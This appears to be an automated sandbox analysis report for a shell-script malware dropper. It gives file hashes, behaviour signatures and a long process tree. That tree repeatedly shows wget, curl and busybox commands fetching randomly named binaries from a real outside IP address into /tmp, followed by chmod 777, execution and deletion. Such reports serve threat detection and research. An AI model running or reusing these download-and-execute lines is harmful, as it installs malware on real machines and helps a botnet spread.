Analysis
- max time kernel: 40s
- max time network: 42s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 21/10/2024, 01:35
Tasks
- Static task static1
- Behavioral task behavioral1: Sample a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh; Resource ubuntu1804-amd64-20240508-en
- Behavioral task behavioral2: Sample a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh; Resource debian9-armhf-20240611-en
- Behavioral task behavioral3: Sample a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh; Resource debian9-mipsbe-20240729-en
- Behavioral task behavioral4: Sample a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh; Resource debian9-mipsel-20240226-en
General
- Target: a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh
- Size: 10KB
- MD5: 3a1ff8e10160c3ffbe68101993bf1067
- SHA1: cbe663779e29b21349683a8c313cd1cb1c5eecaf
- SHA256: a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63
- SHA512: 8513787e954b7a1209578497e6d91f13f54b1ab38ef937cb0f6d6cfd320fc1c4c4a7a8a4890ee1a8ad873d62e91cb2e5e82fa1f3673c62e6bb23d94110307586
- SSDEEP: 192:v7mG3aGTwUII9c4gCONyqRGZy5947TfmG3aGL4II9c845947T/CONyqy:vS4gCONyqRGZy5947Te45947T/CONyqy
Malware Config
Signatures
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid | Process
806 | chmod
842 | chmod
862 | chmod
877 | chmod
798 | chmod
830 | chmod
895 | chmod
915 | chmod
824 | chmod
848 | chmod
681 | chmod
812 | chmod
889 | chmod
901 | chmod
750 | chmod
773 | chmod
854 | chmod
921 | chmod
927 | chmod
711 | chmod
731 | chmod
818 | chmod
883 | chmod
908 | chmod
689 | chmod
790 | chmod
836 | chmod
871 | chmod
Executes dropped EXE 28 IoCs
ioc | pid | Process
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | 682 | LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | 691 | zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | 712 | 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | 732 | rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | 751 | nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | 775 | OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | 791 | HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | 799 | hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | 807 | AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | 813 | 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | 819 | phFMgsQArmVdg945D14ipduIUYswPNrcK1
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | 825 | NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | 831 | VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | 837 | YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP
/tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | 843 | rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe
/tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | 849 | nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c
/tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | 855 | OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W
/tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | 863 | HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu
/tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | 872 | 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO
/tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | 878 | hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr
/tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | 884 | AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a
/tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | 890 | phFMgsQArmVdg945D14ipduIUYswPNrcK1
/tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | 896 | NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh
/tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | 902 | VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG
/tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | 909 | YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP
/tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | 916 | 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC
/tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | 922 | LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM
/tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | 928 | zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK
Checks CPU configuration 1 TTPs 28 IoCs
Checks CPU information, which indicates whether the system is a virtual machine.
description | ioc | Process
File opened for reading | /proc/cpuinfo | curl (28 identical entries, one per curl process)
Reads runtime system information 56 IoCs
description | ioc | Process
File opened for reading | /proc/sys/crypto/fips_enabled | curl (28 entries)
File opened for reading | /proc/self/auxv | curl (28 entries)
System Network Configuration Discovery 1 TTPs 20 IoCs
Adversaries may gather information about the network configuration of a system.
pid | Process
791 | HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu
817 | busybox
819 | phFMgsQArmVdg945D14ipduIUYswPNrcK1
820 | rm
860 | curl
886 | wget
777 | wget
782 | curl
887 | curl
888 | busybox
863 | HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu
864 | rm
890 | phFMgsQArmVdg945D14ipduIUYswPNrcK1
857 | wget
861 | busybox
891 | rm
786 | busybox
793 | rm
815 | wget
816 | curl
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description | ioc | Process
File opened for modification | /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | curl
File opened for modification | /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | curl
File opened for modification | /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | curl
File opened for modification | /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | curl
File opened for modification | /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | curl
File opened for modification | /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | curl
File opened for modification | /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | curl
File opened for modification | /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | curl
File opened for modification | /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | curl
File opened for modification | /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | curl
File opened for modification | /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | curl
File opened for modification | /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | curl
File opened for modification | /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | curl
File opened for modification | /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | curl
File opened for modification | /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | curl
File opened for modification | /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | curl
File opened for modification | /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | curl
File opened for modification | /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | curl
File opened for modification | /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | curl
File opened for modification | /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | curl
File opened for modification | /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | curl
File opened for modification | /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | curl
File opened for modification | /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | curl
File opened for modification | /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | curl
File opened for modification | /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | curl
File opened for modification | /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | curl
File opened for modification | /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | curl
File opened for modification | /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | curl
Processes
Process | Command line | PID | Signatures (child processes are indented under their parent)
- /tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh | /tmp/a68b603604589b97f5046adc8baf93024e992dd271482c827a4ff365258cbb63.sh | PID 648
  - /bin/rm | /bin/rm bins.sh | PID 651
  - /usr/bin/wget | wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 655
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 672 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 679
  - /bin/chmod | chmod 777 LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 681 | File and Directory Permissions Modification
  - /tmp/LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | ./LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 682 | Executes dropped EXE
  - /bin/rm | rm LkORURb6UsJB4YDCaSHURVJpnssGyXSEHM | PID 683
  - /usr/bin/wget | wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 684
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 685 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 686
  - /bin/chmod | chmod 777 zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 689 | File and Directory Permissions Modification
  - /tmp/zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | ./zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 691 | Executes dropped EXE
  - /bin/rm | rm zAvCXOWX1g8pqYnWYeZ9xRDciqn79kUfIK | PID 692
  - /usr/bin/wget | wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 694
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 699 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 706
  - /bin/chmod | chmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 711 | File and Directory Permissions Modification
  - /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | ./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 712 | Executes dropped EXE
  - /bin/rm | rm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 713
  - /usr/bin/wget | wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 715
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 720 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 726
  - /bin/chmod | chmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 731 | File and Directory Permissions Modification
  - /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | ./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 732 | Executes dropped EXE
  - /bin/rm | rm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 733
  - /usr/bin/wget | wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 735
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 743 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 748
  - /bin/chmod | chmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 750 | File and Directory Permissions Modification
  - /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | ./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 751 | Executes dropped EXE
  - /bin/rm | rm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 752
  - /usr/bin/wget | wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 753
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 754 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 769
  - /bin/chmod | chmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 773 | File and Directory Permissions Modification
  - /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | ./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 775 | Executes dropped EXE
  - /bin/rm | rm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 776
  - /usr/bin/wget | wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 777 | System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 782 | Checks CPU configuration, Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 786 | System Network Configuration Discovery
  - /bin/chmod | chmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 790 | File and Directory Permissions Modification
  - /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | ./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 791 | Executes dropped EXE, System Network Configuration Discovery
  - /bin/rm | rm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 793 | System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 794
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 796 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 797
  - /bin/chmod | chmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 798 | File and Directory Permissions Modification
  - /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | ./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 799 | Executes dropped EXE
  - /bin/rm | rm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 800
  - /usr/bin/wget | wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 801
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 802 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 805
  - /bin/chmod | chmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 806 | File and Directory Permissions Modification
  - /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | ./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 807 | Executes dropped EXE
  - /bin/rm | rm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 808
  - /usr/bin/wget | wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 809
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 810 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 811
  - /bin/chmod | chmod 777 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 812 | File and Directory Permissions Modification
  - /tmp/3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | ./3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 813 | Executes dropped EXE
  - /bin/rm | rm 3SrM4CtzjYWyrkrIWxSxPaJQUaWQLXutHC | PID 814
  - /usr/bin/wget | wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 815 | System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 816 | Checks CPU configuration, Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 817 | System Network Configuration Discovery
  - /bin/chmod | chmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 818 | File and Directory Permissions Modification
  - /tmp/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | ./phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 819 | Executes dropped EXE, System Network Configuration Discovery
  - /bin/rm | rm phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 820 | System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 821
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 822 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 823
  - /bin/chmod | chmod 777 NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 824 | File and Directory Permissions Modification
  - /tmp/NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | ./NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 825 | Executes dropped EXE
  - /bin/rm | rm NPEIwffrDkzflwPJOJKEn3TnSTYQNyyAOh | PID 826
  - /usr/bin/wget | wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 827
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 828 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 829
  - /bin/chmod | chmod 777 VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 830 | File and Directory Permissions Modification
  - /tmp/VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | ./VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 831 | Executes dropped EXE
  - /bin/rm | rm VKemfdmJuQsAHmB9faf3IEsH2aZZnpMryG | PID 832
  - /usr/bin/wget | wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 833
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 834 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 835
  - /bin/chmod | chmod 777 YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 836 | File and Directory Permissions Modification
  - /tmp/YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | ./YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 837 | Executes dropped EXE
  - /bin/rm | rm YrQOP5pbycr0oqyLtWdgrfWC6qI5gjD2gP | PID 838
  - /usr/bin/wget | wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 839
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 840 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 841
  - /bin/chmod | chmod 777 rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 842 | File and Directory Permissions Modification
  - /tmp/rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | ./rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 843 | Executes dropped EXE
  - /bin/rm | rm rxPOK0noBhIvpcGEuT9FpvUPBpzfhG7zZe | PID 844
  - /usr/bin/wget | wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 845
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 846 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 847
  - /bin/chmod | chmod 777 nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 848 | File and Directory Permissions Modification
  - /tmp/nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | ./nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 849 | Executes dropped EXE
  - /bin/rm | rm nhXzr29PHnj6VPMkm39faNIlJ42Po6lC1c | PID 850
  - /usr/bin/wget | wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 851
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 852 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 853
  - /bin/chmod | chmod 777 OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 854 | File and Directory Permissions Modification
  - /tmp/OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | ./OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 855 | Executes dropped EXE
  - /bin/rm | rm OBgE8e5eRoOQN4fhfpoeCfvhla1kLMxh5W | PID 856
  - /usr/bin/wget | wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 857 | System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 860 | Checks CPU configuration, Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 861 | System Network Configuration Discovery
  - /bin/chmod | chmod 777 HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 862 | File and Directory Permissions Modification
  - /tmp/HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | ./HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 863 | Executes dropped EXE, System Network Configuration Discovery
  - /bin/rm | rm HuTXuUOBeubnGnBL4rTPUG3lBHInIpUVvu | PID 864 | System Network Configuration Discovery
  - /usr/bin/wget | wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 865
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 866 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 867
  - /bin/chmod | chmod 777 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 871 | File and Directory Permissions Modification
  - /tmp/81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | ./81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 872 | Executes dropped EXE
  - /bin/rm | rm 81azFCp4DBuyO8knuFEoQT1JVye5Tmx6WO | PID 873
  - /usr/bin/wget | wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 874
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 875 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 876
  - /bin/chmod | chmod 777 hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 877 | File and Directory Permissions Modification
  - /tmp/hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | ./hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 878 | Executes dropped EXE
  - /bin/rm | rm hspzJhZLA9zG2b9TdapWev0WgRv1TEBWZr | PID 879
  - /usr/bin/wget | wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 880
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 881 | Checks CPU configuration, Reads runtime system information, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 882
  - /bin/chmod | chmod 777 AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 883 | File and Directory Permissions Modification
  - /tmp/AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | ./AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 884 | Executes dropped EXE
  - /bin/rm | rm AiN2qqyOhu5NO4QbTIbOn0CoXWMfXayJ7a | PID 885
  - /usr/bin/wget | wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 886 | System Network Configuration Discovery
  - /usr/bin/curl | curl -O http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 887 | Checks CPU configuration, Reads runtime system information, System Network Configuration Discovery, Writes file to tmp directory
  - /bin/busybox | /bin/busybox wget http://87.120.84.230/bins/phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 888 | System Network Configuration Discovery
  - /bin/chmod | chmod 777 phFMgsQArmVdg945D14ipduIUYswPNrcK1 | PID 889 | File and Directory Permissions Modification
